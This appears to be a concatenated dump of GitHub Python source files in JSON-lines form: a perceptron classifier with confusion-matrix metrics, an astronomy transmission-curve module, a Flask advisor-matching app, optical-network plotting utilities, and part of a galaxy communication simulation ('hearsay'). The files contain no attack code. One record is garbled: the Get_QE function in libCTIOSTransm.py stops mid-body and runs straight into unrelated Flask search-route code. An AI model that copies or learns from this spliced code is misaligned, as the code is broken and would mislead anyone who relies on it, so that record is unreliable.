    v_predito = preditos[indice]\n\n            # the true value belongs to the positive class\n            if v_real == true_class:\n                tp += 1 if v_predito == v_real else 0\n                fp += 1 if v_predito != v_real else 0\n            else:\n                tn += 1 if v_predito == v_real else 0\n                fn += 1 if v_predito != v_real else 0\n        \n        return np.array([\n            # positive-class values\n            [ tp, fp ],\n            # negative-class values\n            [ fn, tn ]\n        ])\n\n    def get_accuracy(self, confusion_matrix):\n        tp = confusion_matrix[0][0]\n        tn = confusion_matrix[1][1]\n        fp = confusion_matrix[0][1]\n        fn = confusion_matrix[1][0]\n\n        return ((tp + tn) / (tp+ fp + tn + fn))\n    \n    def get_precision(self, confusion_matrix):\n        tp = confusion_matrix[0][0]\n        fp = confusion_matrix[0][1]\n\n        return (tp / (tp + fp))\n    \n    def get_recall(self, confusion_matrix):\n        tp = confusion_matrix[0][0]\n        fn = confusion_matrix[1][0]\n\n        return (tp / (tp + fn))\n\n    def get_f_score(self, precision, recall):\n        return (2 * (precision * recall) / \n                (precision + recall))\n\n    def activation_function(self, value):\n        return (1 if value >= self.__degree else 0)\n\n    def adjust_weights(self, x_enter, result, expected_result):\n        new_weights = self.__weights + \\\n            (self.__learn_tax * (expected_result - result) * x_enter)\n        return new_weights\n\n    def generate_weights(self, weight_random_seed):\n        return np.random.uniform(low=weight_random_seed[0], high=weight_random_seed[1], size=3)\n\n    def generate_train_test_dataset(self, split):\n        # check that the random index generation does not repeat rows between the training and test datasets, otherwise the generated sets may contain duplicates or fail to cover the full dataset\n        dataset_len_row = self.__dataset.shape[0]\n        # condition used for testing with the small input from class\n        if(split == 
\"without\"):\n x_training = np.array((self.__dataset[0:, :2]))\n y_training = np.array((self.__dataset[0:, 2:]))\n return (x_training, y_training, np.array((0)), np.array((0)))\n\n tirthy_percenty = round(dataset_len_row * 0.3)\n seventy_percenty = round(dataset_len_row * 0.7)\n\n training_idx = np.random.randint(\n dataset_len_row, size=seventy_percenty)\n test_idx = np.random.randint(dataset_len_row, size=tirthy_percenty)\n\n training, test = self.__dataset[training_idx,\n :], self.__dataset[test_idx, :]\n x_training = np.array((training[0:, :2]))\n y_training = np.array((training[0:, 2:]))\n x_test = np.array((test[0:, :2]))\n y_test = np.array((test[0:, 2:]))\n\n return (x_training, y_training, x_test, y_test)\n\n def generate_hyperplane(self):\n if(not self.__fit):\n raise NoFitError(self.__fit, \"Error: Perceptron isn't trained\")\n \n slope = -(self.__weights[0] / self.__weights[2]) / (self.__weights[0] / self.__weights[1])\n intercept = -(self.__weights[0] / self.__weights[2])\n \n x_min = np.amin(self.__x_training[:,:1])\n x_max = np.amax(self.__x_training[:,:1])\n\n x = np.linspace(x_min,x_max)\n #y =mx+c, m is slope and c is inte\n y = [(slope * i) - intercept for i in x]\n return (x, y)\n \n @property\n def degree(self):\n return self.__degree\n\n @property\n def x_training(self):\n return self.__x_training\n\n @property\n def y_training(self):\n return self.__y_training\n\n @property\n def x_test(self):\n return self.__x_test\n\n @property\n def y_test(self):\n return self.__y_test\n\n @property\n def weights(self):\n return self.__weights\n\n @property\n def number_of_weights_adjust(self):\n return self.__number_of_weights_adjust\n\n @property\n def number_of_epochs(self):\n return self.__number_of_epochs\n\n\n\nif __name__ == \"__main__\":\n file = np.fromfile(\"./rna-2020.1-pp2-data/data2.txt\")\n file = file.reshape((int(file.shape[0] / 3), 3))\n conjunto_treinamento_aula = np.array([[2, 2, 1], [4, 4, 0]])\n b = Perceptron(dataset=file,split=\"holdout\")\n #b.fit()\n b.fit2(100)\n confusion_matrix = b.get_confusion_matrix(b.y_test, b.predict(), [0, 1])\n accuracy = b.get_accuracy(confusion_matrix)\n precision = b.get_precision(confusion_matrix)\n recall = b.get_recall(confusion_matrix)\n f_score = b.get_f_score(precision, recall)\n print(accuracy, precision, recall, f_score)\n # print(\"## reta\")\n # print(b.x_training.shape[0])\n\ndef questao_2():\n file = np.fromfile(\"./rna-2020.1-pp2-data/data2.txt\")\n file = file.reshape((int(file.shape[0] / 3), 3))\n print(file)\n learn_taxs = [0.4, 0.1, 0.01]\n weights = [[-100, 100], [-1, 1], [-0.5, 0.5]]\n\n results = {}\n\n for tax in learn_taxs:\n for weight in weights:\n key = str(tax) + str(weight)\n results[key] = []\n print(key)\n\n for i in range(0, 101):\n b = Perceptron(\n dataset=file, weight_random_seed=weight, learn_tax=tax)\n b.fit()\n\n results[key].append({\n 'hyperplane': b.generate_hyperplane(),\n 'number_of_weights_adjust': b.number_of_weights_adjust,\n 'number_of_epochs': b.number_of_epochs\n })\n print(results)","repo_name":"adhamlucas/supervised-learning-pp2","sub_path":"ellolib.py","file_name":"ellolib.py","file_ext":"py","file_size_in_byte":9847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74740835626","text":"\"\"\"\nlibCTIOSTransm.py\n=============----\n\nauthor : Sylvie Dagoret-Campagne\naffiliation : LAL/CNRS/IN2P3/FRANCE\nCollaboration : DESC-LSST\n\nPurpose : Provide the various transmission usefull\nupdate : October 17 : set the path 
{"seq_id":"74740835626","text":"\"\"\"\nlibCTIOSTransm.py\n=============----\n\nauthor : Sylvie Dagoret-Campagne\naffiliation : LAL/CNRS/IN2P3/FRANCE\nCollaboration : DESC-LSST\n\nPurpose : Provide the various transmission curves\nupdate : October 17 : set the path with environment variables\n\n\"\"\"\n\n\nimport os\nimport re\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom astropy.io import fits\nfrom astropy.io import ascii\n\nfrom scipy.interpolate import UnivariateSpline\nfrom scipy.interpolate import interp1d\n\nhome = os.environ['HOME'] + '/'\npath_ctioanajun2017 = os.environ['CTIOAnaJun2017DIR']\npath_CTIOtransm = path_ctioanajun2017 + '/spectrumsim/CTIOThroughput'\n\n#\nfilename_qe = \"qecurve.txt\"\nfilename_FGB37 = \"FGB37.txt\"\nfilename_RG175 = \"RG175.txt\"\nfilename_Throughput = 'ctio_throughput.txt'\nfilename_mirrors = 'lsst_mirrorthroughput.txt'\n\nWLMIN = 300.\nWLMAX = 1100.\n\n#-----------------------------------------------------------------------------\ndef Get_QE():\n\n    filename = os.path.join(path_CTIOtransm, filename_qe)\n\n    data_qe = ascii.read(filename)\n    x = data_qe[\"col1\"]\n    y = data_qe[\"col2\"] / 100.\n    indexes = np.where(np.logical_and(x > WLMIN, x < WLMAX))\n    if len(company_term.strip()) > 0 and len(department_term.strip()) == 0:\n        print(\"Search advisor by company = \" + company_term)\n        for person in providers:\n            if company_term in person[\"company\"].lower():\n                results.append(person)\n                results_id.add(person[\"id\"])\n    elif len(department_term.strip()) > 0 and len(company_term.strip()) == 0:\n        print(\"Search advisor by department = \" + department_term)\n        for person in providers:\n            if department_term in person[\"department\"].lower():\n                results.append(person)\n                results_id.add(person[\"id\"])\n    else:\n        for person in providers:\n            if company_term in person[\"company\"].lower():\n                if department_term in person[\"department\"].lower():\n                    results.append(person)\n                    results_id.add(person[\"id\"])\n    global company_search_term\n    global department_search_term\n    company_search_term = None\n    department_search_term = None\n\n    return jsonify(matches=results)\n\n@app.route('/create_profile')\ndef create_profile():\n    if current_advisor_profile is None:\n        return render_template(\"create_profile.html\", current_user={})\n    else:\n        return render_template(\"create_profile.html\", current_user=current_advisor_profile)\n\n@app.route('/save_advisor', methods=['GET', 'POST'])\ndef save_advisor():\n    global providers_current_id\n    global providers\n    global current_advisor_profile\n\n    advisor_data = request.get_json()[\"entry\"]\n    current_advisor_profile = {\n        \"id\": providers_current_id,\n        \"name\": advisor_data[\"name\"],\n        \"university\": advisor_data[\"university\"],\n        \"department\": advisor_data[\"department\"],\n        \"company\": advisor_data[\"company\"],\n        \"interests\": advisor_data[\"interests\"],\n        \"availability\": advisor_data[\"availability\"],\n        \"bookmarked\": False,\n    }\n\n    providers.append(current_advisor_profile)\n    providers_current_id += 1\n    return jsonify(advisors=providers, current=current_advisor_profile)\n\n@app.route('/edit_profile', methods=['GET', 'POST'])\ndef edit_profile():\n    global providers_current_id\n    global providers\n    global current_advisor_profile\n    advisor_data = request.get_json()\n    current_advisor_profile = advisor_data\n\n    for person in providers:\n        if person[\"id\"] == advisor_data[\"id\"]:\n            person[\"name\"] = advisor_data[\"name\"]\n            person[\"university\"] = advisor_data[\"university\"]\n            person[\"company\"] = advisor_data[\"company\"]\n            person[\"department\"] = advisor_data[\"department\"]\n            person[\"interests\"] = advisor_data[\"interests\"]\n            person[\"availability\"] = advisor_data[\"availability\"]\n    return jsonify(current_user=current_advisor_profile)
\n\n@app.route('/delete_profile', methods=['GET', 'POST'])\ndef delete_profile():\n    global providers_current_id\n    global providers\n    global current_advisor_profile\n\n    delete_id = request.get_json()[\"id\"]\n\n    for x in range(len(providers)):\n        if providers[x][\"id\"] == int(delete_id):\n            providers.remove(providers[x])\n            # stop after the first match: removing while iterating over the\n            # original range would otherwise run past the shortened list\n            break\n\n    current_advisor_profile = None\n    providers_current_id -= 1\n    return jsonify(current_user={})\n\n@app.route('/user_profile')\ndef user_profile():\n    if current_advisor_profile is None:\n        return render_template(\"user_profile.html\", current_user={})\n    else:\n        return render_template(\"user_profile.html\", current_user=current_advisor_profile)\n\n@app.route('/set_search_terms', methods=['GET', 'POST'])\ndef set_search_terms():\n    global company_search_term\n    global department_search_term\n\n    company_search_term = request.get_json()[\"company\"]\n    department_search_term = request.get_json()[\"department\"]\n    return jsonify(data={})\n\n@app.route('/set_bookmark', methods=['GET', 'POST'])\ndef set_bookmark():\n    global providers\n\n    add_ids = request.get_json()[\"add\"]\n    remove_ids = request.get_json()[\"remove\"]\n\n    for person in providers:\n        if person[\"id\"] in add_ids:\n            person[\"bookmarked\"] = True\n        if person[\"id\"] in remove_ids:\n            person[\"bookmarked\"] = False\n    return jsonify(data={})\n\n@app.route('/coffee/<id>')\ndef coffee(id):\n    requested_advisor = None\n    for person in providers:\n        if person[\"id\"] == int(id):\n            requested_advisor = person\n    return render_template(\"coffee.html\", requested_advisor=requested_advisor)\n\n@app.route('/set_coffee', methods=['GET', 'POST'])\ndef set_coffee():\n    global meeting_requests\n    global meeting_id\n    addition = request.get_json()[\"add\"]\n    print(addition)\n    addition['id'] = meeting_id\n    meeting_id = meeting_id + 1\n    meeting_requests.insert(0, addition)\n    return jsonify(data=meeting_requests)\n\n@app.route('/all_coffee')\ndef all_coffee():\n    global meeting_requests\n    return render_template(\"all_coffee.html\", coffee=meeting_requests)\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', debug=True)\n","repo_name":"tigerlily-he/CS6998_hw3","sub_path":"CS6998_hw3.py","file_name":"CS6998_hw3.py","file_ext":"py","file_size_in_byte":7084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
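A quick way to exercise the endpoints above is with the requests library. A hedged sketch, assuming the app is running on Flask's default local address (the host, port, and all payload values below are illustrative, not taken from the record):

import requests

BASE = "http://127.0.0.1:5000"  # assumed local dev server

# create a profile; the payload shape mirrors what save_advisor reads
entry = {"name": "Ada", "university": "MIT", "department": "CS",
         "company": "Acme", "interests": "ML", "availability": "Fri"}
created = requests.post(f"{BASE}/save_advisor", json={"entry": entry}).json()
new_id = created["current"]["id"]

# bookmark the new profile, then delete it again
requests.post(f"{BASE}/set_bookmark", json={"add": [new_id], "remove": []})
requests.post(f"{BASE}/delete_profile", json={"id": new_id})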
{"seq_id":"34844937407","text":"import math\n\nfrom matplotlib.offsetbox import AnchoredText\n\nfrom Lab10.core.Elements.Network import Network\nfrom Lab10.core.Elements.Connection import Connection\nimport random as rand\nimport matplotlib.pyplot as plt\nimport statistics as st\nimport pandas as pd\nimport numpy as np\nimport copy\nfrom math import inf\n\nBIT_RATE_100G = 100e9\n\ndef truncate(number, decimals=0):\n    \"\"\"\n    Returns a value truncated to a specific number of decimal places.\n    \"\"\"\n    if not isinstance(decimals, int):\n        raise TypeError(\"decimal places must be an integer.\")\n    elif decimals < 0:\n        raise ValueError(\"decimal places has to be 0 or more.\")\n    elif decimals == 0:\n        return math.trunc(number)\n\n    factor = 10.0 ** decimals\n    return math.trunc(number * factor) / factor\n\n\ndef network_initialization(path_nodes, weighted_path, connections):\n    net = Network(path_nodes)\n    net.connect()\n    net.weighted_path = weighted_path\n    net.update_routing_space(None)  # Restore routing space\n    return net\n\n\ndef get_random_connections():\n    connections_a = []\n    nodes = 'ABCDEF'\n    for i in range(0, 100):\n        input_rand = rand.choice(nodes)\n        while True:\n            output_rand = rand.choice(nodes)\n            if input_rand != output_rand:\n                break\n        connections_a.append(Connection(input_rand, output_rand, 1e-3))\n    return connections_a\n\n\ndef plot_snr_and_bit_rate(strategy, connections):\n    snr_connections = [c.snr for c in connections]\n    plt.figure()\n    plt.hist(snr_connections, label='SNR distribution')\n    plt.title('SNR distribution with ' + str(strategy) + ' rate')\n    plt.xlabel('SNR [dB]')\n    plt.ylabel('Number of connections')\n    plt.show()\n\n    bit_rate_connections = [c.bit_rate for c in connections if c.bit_rate != 0]\n    f, ax = plt.subplots(1, 1)\n    ax.hist(bit_rate_connections, label='Bit rate histogram')\n    plt.title('Bit rate of accepted connections - ' + str(strategy) + ' rate')\n    plt.xlabel('bit rate [bps]')\n    plt.ylabel('Number of connections')\n    avg_bit_rate = truncate(st.mean(bit_rate_connections) / (1e9), 3)\n    tot_capacity = truncate((sum(bit_rate_connections) / (1e9)), 3)\n    print('Strategy = ' + str(strategy) + ' rate\\n' +\n          \"Overall average bit rates of accepted connections: \", avg_bit_rate, 'Gbps\\n' +\n          \"Total capacity allocated into the network: \", tot_capacity, 'Gbps')\n    # text box with the aggregate figures\n    anchored_text = AnchoredText(\n        'Average bit rate = ' + str(avg_bit_rate) + 'Gbps' + '\\nTotal capacity allocated = ' + str(\n            tot_capacity) + 'Gbps', loc='upper left', pad=0.5, prop=dict(size=9))\n    ax.add_artist(anchored_text)\n    plt.show()\n\n\ndef plot_traffic_matrix(traffic_matrix, strategy, M):\n    a = pd.DataFrame.from_dict(traffic_matrix).to_numpy(dtype=float, na_value=None).astype(float)\n    fig, ax = plt.subplots()\n\n    for i in range(pd.DataFrame.from_dict(traffic_matrix).shape[0]):\n        for j in range(pd.DataFrame.from_dict(traffic_matrix).shape[1]):\n            ax.text(j, i, a[i, j],\n                    ha=\"center\", va=\"center\", color=\"w\")\n    x_labels = ['A', 'B', 'C', 'D', 'E', 'F']\n    y_labels = ['A', 'B', 'C', 'D', 'E', 'F']\n    # Create dummy x values, with a value for every label entry\n    x = np.r_[:len(x_labels)]\n    y = np.r_[:len(y_labels)]\n    # Change the xticks and yticks as desired\n    plt.title('Traffic matrix with ' + str(strategy) + ' rate and M = ' + str(M))\n    plt.xticks(x, x_labels)\n    plt.yticks(y, y_labels)\n    cmap = copy.copy(plt.cm.get_cmap(\"jet\"))\n    cmap.set_bad('orange', 1.)\n    ax.imshow(a, interpolation='nearest', cmap=cmap)\n\n\ndef traffic_matrix_initialization(network, M):\n    traffic_matrix = {}\n    for node in network.nodes.keys():\n        traffic_matrix[node] = {}\n        for node_ in network.nodes.keys():\n            if node != node_:\n                traffic_matrix[node][node_] = BIT_RATE_100G * M\n            else:\n                traffic_matrix[node][node_] = inf\n    return traffic_matrix\n\ndef wavelength_congestion(network, M, strategy):\n    # Wavelength congestion flex\n    occupancy = []\n    for label in network.lines.keys():\n        counter = 0\n        line_state = network.lines[label].state\n        for c in line_state:\n            counter += c\n        occupancy.append((1 - (counter / len(line_state))) * 100)\n        print(label + \" \" + str((1 - (counter / len(line_state))) * 100))\n    plt.figure()\n    plt.scatter(list(network.lines.keys()), occupancy, label='Wavelength congestion')\n    plt.xlabel('Lines')\n    plt.ylabel('Congestion [%]')\n    plt.title('Wavelength congestion ' + strategy + ' rate with M = ' + str(M))\n    plt.xticks(list(network.lines.keys()))\n    plt.grid(True, linewidth=0.5, linestyle='--')\n    plt.show()","repo_name":"ValeMargi/Laboratory_OON","sub_path":"Lab10/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
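truncate() above chops toward zero rather than rounding, which is why the averages printed by plot_snr_and_bit_rate keep exactly three stable decimals. A small self-contained illustration of the difference (the values are arbitrary):

import math

def truncate(number, decimals=0):
    # same truncation rule as in the record above
    factor = 10.0 ** decimals
    return math.trunc(number * factor) / factor

print(truncate(3.14159, 3))   # 3.141  (round() would give 3.142)
print(truncate(-2.71828, 2))  # -2.71  (truncation moves toward zero)
print(round(-2.71828, 2))     # -2.72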
plt.show()","repo_name":"ValeMargi/Laboratory_OON","sub_path":"Lab10/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40494225327","text":"\"\"\"HEARSAY.\n\nThis module contains tools to compute and analyze numerical simulations of\na Galaxy with constrained causally connected nodes. It simulates a 2D\nsimplified version of a disk galaxy and perform discrete event simulations\nto explore three parameters:\n1. the mean time for the appeareance of new nodes,\n2. the mean lifetime of the nodes, and\n3. the maximum reach of signals.\n\nA simulation is a realization of the Constrained Causally Connected Network\n(C3Net) model. The details of this model are explained in\nLares, Funes & Gramajo (under review).\n\nClasses in this module:\n- Parser\n- C3Net\n- Results\n\nAdditionally, it contains the function unwrap_run which is used for parallel\nruns with the joblib library.\n\"\"\"\n\nimport numpy as np\nfrom configparser import ConfigParser\nimport itertools\nimport pandas as pd\nimport pickle\nimport sys\nfrom tqdm import tqdm\nfrom hearsay.olists import OrderedList\n\n\nclass Parser(ConfigParser):\n \"\"\"parser class.\n\n Manipulation of configuration parameters. This method allows to read a\n configuration file or to set parameters for a Constrained Causally\n Conected Network (C3Net) model.\n \"\"\"\n\n def __init__(self, argv=None, *args, **kwargs):\n \"\"\"Initialize a parser.\n\n Parameters\n ----------\n None\n Returns\n -------\n None\n Raises\n ------\n None\n \"\"\"\n super().__init__()\n self.message = None\n self.check_file(argv)\n self.read_config_file()\n\n self.load_filenames()\n self.load_config(*args, **kwargs)\n self.check_settings()\n\n def check_file(self, sys_args=\"\"):\n \"\"\"Parse paramenters for the simulation from a .ini file.\n\n Parameters\n ----------\n filename (str): the file name of the map to be read\n\n Raises\n ------\n None\n\n Returns\n -------\n None\n \"\"\"\n from os.path import isfile\n\n mess = (\"Configuration file expected:\"\n \"\\n\\t filename or CLI input\"\n \"\\n\\t example: python run_correlation.py\"\n \"\\n\\t ../set/experiment.ini\"\n \"\\n\\t Using default configuration file\")\n if isinstance(sys_args, str):\n if isfile(sys_args):\n msg = f\"Loading configuration parameters from {sys_args}\"\n self.message = msg\n filename = sys_args\n else:\n self.message = \"Input argument is not a valid file\\\n Using default configuration file instead\"\n filename = '../set/experiment.ini'\n\n elif isinstance(sys_args, list):\n\n if len(sys_args) == 2:\n filename = sys_args[1]\n\n if isfile(filename):\n msg = f\"Loading configuration parameters from {filename}\"\n self.message = msg\n else:\n self.message = mess\n filename = '../set/experiment.ini'\n else:\n self.message = mess\n filename = '../set/experiment.ini'\n\n else:\n self.message = mess\n filename = '../set/experiment.ini'\n\n self.filename = filename\n\n def read_config_file(self):\n \"\"\"Parse paramenters for the simulation from a .ini file.\n\n Parameters\n ----------\n None\n\n Raises\n ------\n None\n\n Returns\n -------\n None\n \"\"\"\n self.read(self.filename)\n\n def load_filenames(self):\n \"\"\"Make filenames based on info in config file.\n\n Parameters\n ----------\n None\n\n Raises\n ------\n None\n\n Returns\n -------\n list of filenames\n \"\"\"\n from collections import namedtuple\n\n # Experiment settings\n exp_id = 
self['experiment']['exp_id']\n        dir_plots = self['output']['dir_plots']\n        pars_root = self['output']['pars_root']\n        progress_root = self['output']['progress_root']\n        dir_output = self['output']['dir_output']\n        plot_fname = self['output']['plot_fname']\n        plot_ftype = self['output']['plot_ftype']\n\n        fname = dir_plots + plot_fname + '_' + exp_id + plot_ftype\n\n        names = 'exp_id \\\n                 dir_plots \\\n                 dir_output \\\n                 pars_root \\\n                 progress_root \\\n                 plot_fname \\\n                 plot_ftype \\\n                 fname'\n\n        parset = namedtuple('pars', names)\n\n        res = parset(exp_id,\n                     dir_plots,\n                     dir_output,\n                     pars_root,\n                     progress_root,\n                     plot_fname,\n                     plot_ftype,\n                     fname)\n\n        self.filenames = res\n\n    def load_config(self, keys=None, values=None, nran=None,\n                    *args, **kwargs):\n        \"\"\"Load parameters from config file.\n\n        Parameters\n        ----------\n        None\n\n        Raises\n        ------\n        None\n\n        Returns\n        -------\n        list of parameters as a named tuple\n        \"\"\"\n        if isinstance(keys, list):\n            # override configuration file with arguments\n            if len(keys) != len(values):\n                print('Error overriding parameters (using file values)')\n            else:\n                for k, v in zip(keys, values):\n                    for sec in self.sections():\n                        has = self.has_option(sec, k)\n                        if has:\n                            self[sec][k] = v\n\n        choice = self['UX']['verbose']\n        if choice.lower() in 'yesitrue':\n            verbose = True\n        elif choice.lower() in 'nofalse':\n            verbose = False\n        else:\n            print('warning in .ini file: UX: verbose')\n            verbose = False\n\n        if verbose:\n            print('loading parameters...')\n        from collections import namedtuple\n\n        ghz_inner = float(self['simu']['ghz_inner'])\n        ghz_outer = float(self['simu']['ghz_outer'])\n\n        t_max = float(self['simu']['t_max'])\n\n        tau_a_min = float(self['simu']['tau_a_min'])\n        tau_a_max = float(self['simu']['tau_a_max'])\n        tau_a_nbins = int(self['simu']['tau_a_nbins'])\n\n        tau_s_min = float(self['simu']['tau_s_min'])\n        tau_s_max = float(self['simu']['tau_s_max'])\n        tau_s_nbins = int(self['simu']['tau_s_nbins'])\n\n        d_max_min = float(self['simu']['d_max_min'])\n        d_max_max = float(self['simu']['d_max_max'])\n        d_max_nbins = int(self['simu']['d_max_nbins'])\n\n        if nran is None:\n            nran = int(self['simu']['nran'])\n\n        choices = self['simu']['run_parallel']\n        if choices.lower() in 'yesitrue':\n            run_parallel = True\n        elif choices.lower() in 'nofalse':\n            run_parallel = False\n        else:\n            run_parallel = False\n\n        # Experiment settings\n        exp_id = self['experiment']['exp_id']\n        njobs = int(self['simu']['njobs'])\n        dir_plots = self['output']['dir_plots']\n        dir_output = self['output']['dir_output']\n        pars_root = self['output']['pars_root']\n        plot_fname = self['output']['plot_fname']\n        plot_ftype = self['output']['plot_ftype']\n        fname = dir_plots + plot_fname + '_' + exp_id + plot_ftype\n\n        choice = self['UX']['show_progress']\n        if choice.lower() in 'yesitrue':\n            showp = True\n        elif choice.lower() in 'nofalse':\n            showp = False\n        else:\n            print('warning in .ini file: UX: show_progress')\n            showp = False\n\n        string_overwrite = self['output']['clobber']\n        if string_overwrite.lower() in 'yesitrue':\n            overwrite = True\n        elif string_overwrite.lower() in 'nofalse':\n            overwrite = False\n        else:\n            print('warning in .ini file: output: clobber')\n            overwrite = False\n\n        names = ['ghz_inner',\n                 'ghz_outer',\n                 't_max',\n                 'tau_a_min',\n                 'tau_a_max',\n                 'tau_a_nbins',\n                 'tau_s_min',\n                 'tau_s_max',\n                 'tau_s_nbins',\n                 'd_max_min',\n                 'd_max_max',\n                 'd_max_nbins',\n                 'nran',\n                 'run_parallel',\n                 'njobs',\n                 'exp_id',\n                 'dir_plots',\n                 'dir_output',\n                 'pars_root',\n                 'plot_fname',\n                 'plot_ftype',\n                 'fname',\n                 'showp',\n                 'overwrite',\n                 
'verbose']\n        names = ' '.join(names)\n\n        parset = namedtuple('pars', names)\n\n        res = parset(ghz_inner,\n                     ghz_outer,\n                     t_max,\n                     tau_a_min,\n                     tau_a_max,\n                     tau_a_nbins,\n                     tau_s_min,\n                     tau_s_max,\n                     tau_s_nbins,\n                     d_max_min,\n                     d_max_max,\n                     d_max_nbins,\n                     nran,\n                     run_parallel,\n                     njobs,\n                     exp_id,\n                     dir_plots,\n                     dir_output,\n                     pars_root,\n                     plot_fname,\n                     plot_ftype,\n                     fname,\n                     showp,\n                     overwrite,\n                     verbose)\n\n        self.p = res\n\n    def check_settings(self):\n        \"\"\"Check if parameters make sense.\n\n        Parameters\n        ----------\n        None\n\n        Raises\n        ------\n        None\n\n        Returns\n        -------\n        Exception if settings have inconsistencies.\n        \"\"\"\n        from os import path, makedirs\n\n        if self.p.verbose:\n            print(self.message)\n            print('Checking settings...')\n\n        # output directory\n        if not path.isdir(self.p.dir_output):\n            print(f\"Directory {self.p.dir_output} does not exist\")\n\n        try:\n            makedirs(self.p.dir_output)\n            if self.p.verbose:\n                print(\"Directory \", self.p.dir_output, \" Created \")\n        except FileExistsError:\n            # directory already exists\n            pass\n\n        # experiment directory\n        ID_dir = self.p.dir_output + self.p.exp_id\n        if not path.isdir(ID_dir):\n            print(f\"Directory {ID_dir} does not exist\")\n\n        try:\n            makedirs(ID_dir)\n            if self.p.verbose:\n                print(\"Directory \", ID_dir, \" Created \")\n        except FileExistsError:\n            # directory already exists\n            pass\n\n        # plots directory\n        if not path.isdir(self.p.dir_plots):\n            print(f\"Directory {self.p.dir_plots} does not exist\")\n\n        try:\n            makedirs(self.p.dir_plots)\n            if self.p.verbose:\n                print(\"Directory \", self.p.dir_plots, \" Created \")\n        except FileExistsError:\n            # directory already exists\n            pass\n\n\ndef unwrap_run(arg, **kwarg):\n    \"\"\"Wrap the serial function for parallel run.\n\n    This function just calls the serialized version, but allows to run\n    it concurrently.\n    \"\"\"\n    return C3Net.run_suite(*arg, **kwarg)\n\n\nclass C3Net():\n    \"\"\"C3Net: Constrained Causally Connected Network model.\n\n    methods:\n    __init__:\n        instantiates the model\n    __len__:\n        None\n    __repr__:\n        None\n    __str__:\n        None\n    run:\n        Run a suite of simulations for the full parameter set in\n        the configuration file.\n    run_suite:\n        Run a suite of simulations for a given parameter set.\n    run_suite_II:\n        Run a suite of simulations for a given parameter set, to\n        be run in parallel.\n    run_simulation:\n        Run a simulation for a point in parameter space.\n    show_single_ccns:\n        Show the contents of a simulation run.\n    \"\"\"\n\n    def __init__(self, conf=None):\n        \"\"\"Instantiate a C3Net object.\n\n        Parameters\n        ----------\n        None\n        \"\"\"\n        self.params = None\n        self.config = conf\n\n    def __len__(self):\n        \"\"\"Return the number of contacts.\n\n        Parameters\n        ----------\n        None\n        \"\"\"\n        pass\n\n    def __repr__(self):\n        \"\"\"Represent with a string.\n\n        Parameters\n        ----------\n        None\n        \"\"\"\n        return 'C3Net()'\n\n    def __str__(self):\n        \"\"\"Represent with a string.\n\n        Parameters\n        ----------\n        None\n        \"\"\"\n        return 'C3Net()'\n\n    def prepare_dirs(self, filenames):\n        \"\"\"Prepare directories for experiments from dataframes.\n\n        Takes a list of paths and filenames and checks if all\n        paths exist.\n\n        Parameters\n        ----------\n        filenames : list\n            A list with all filenames\n        Returns\n        -------\n        None\n        \"\"\"\n        from os import path, makedirs\n        for f in filenames:\n            s = f.split('/')\n            for k in range(1, len(s)):\n                d = '/'.join(s[:k])\n                if d == '.'
 or d == '..':\n                    continue\n                if not path.isdir(d):\n                    makedirs(d)\n\n    def set_parameters(self, spars=None,\n                       A=None, S=None, D=None,\n                       write_file=False):\n        \"\"\"Set parameters for the experiment.\n\n        If no arguments are given, the parameters are set from the ini file.\n        Parameters\n        ----------\n        spars (dataframe, list or string, optional):\n            Parameters to set the experiment.\n            If spars is a pandas DataFrame, it must contain the keys:\n            ['tau_awakening', 'tau_survive', 'D_max', 'filename'].\n            If spars is a list, it must have length=4, comprising the\n            tau_awakening, tau_survive, d_max, and filename lists.\n            If spars is a string, a file with that name will be read.\n            The file must contain the same four columns, with those names.\n        A (number or list, optional): Values of the tau_awakening parameter\n        S (number or list, optional): Values of the tau_survive parameter\n        D (number or list, optional): Values of the D_max parameter\n        write_file (optional): filename to write the parameter set.\n        \"\"\"\n        p = self.config.p\n\n        if spars is None:\n            tau_awakeningS = np.linspace(p.tau_a_min, p.tau_a_max,\n                                         p.tau_a_nbins)\n            tau_surviveS = np.linspace(p.tau_s_min, p.tau_s_max, p.tau_s_nbins)\n            D_maxS = np.linspace(p.d_max_min, p.d_max_max, p.d_max_nbins)\n        else:\n            if isinstance(spars, pd.DataFrame):\n                tau_awakeningS = spars['tau_awakening']\n                tau_surviveS = spars['tau_survive']\n                D_maxS = spars['D_max']\n                filenames = spars['filename']\n                self.prepare_dirs(filenames)\n            elif isinstance(spars, list):\n                tau_awakeningS = spars[0]\n                tau_surviveS = spars[1]\n                D_maxS = spars[2]\n            else:\n                print('warning: a dataframe or list expected for spars')\n\n        if A is not None:\n            tau_awakeningS = A\n        if S is not None:\n            tau_surviveS = S\n        if D is not None:\n            D_maxS = D\n\n        df = pd.DataFrame(columns=['tau_awakening', 'tau_survive',\n                                   'D_max', 'filename'])\n        if isinstance(spars, pd.DataFrame):\n            if p.verbose:\n                print('parameters dataframe detected')\n            df['tau_awakening'] = spars['tau_awakening']\n            df['tau_survive'] = spars['tau_survive']\n            df['D_max'] = spars['D_max']\n            df['filename'] = spars['filename']\n        elif isinstance(spars, list):\n            if p.verbose:\n                print('parameters list detected')\n            params = []\n            prd = itertools.product(tau_awakeningS, tau_surviveS, D_maxS)\n            for i in prd:\n                params.append(i)\n            k = 0\n            j = 0\n            for pp in params:\n                (tau_awakening, tau_survive, D_max) = pp\n                k += 1\n                i = 0\n                for experiment in range(p.nran):\n                    i += 1\n                    j += 1\n                    dirName = p.dir_output + p.exp_id + '/D' + str(int(D_max))\n                    filename = dirName + '/' + str(k).zfill(5) + '_'\n                    filename = filename + str(i).zfill(3) + '.pk'\n                    df.loc[j] = [tau_awakening, tau_survive, D_max, filename]\n        elif isinstance(spars, str):\n            if p.verbose:\n                print('parameters file detected')\n            df = pd.read_csv(spars)\n        elif spars is None:\n            print('default action: load from config file')\n            params = []\n            prd = itertools.product(tau_awakeningS, tau_surviveS, D_maxS)\n            for i in prd:\n                params.append(i)\n            k = 0\n            j = 0\n\n            A = 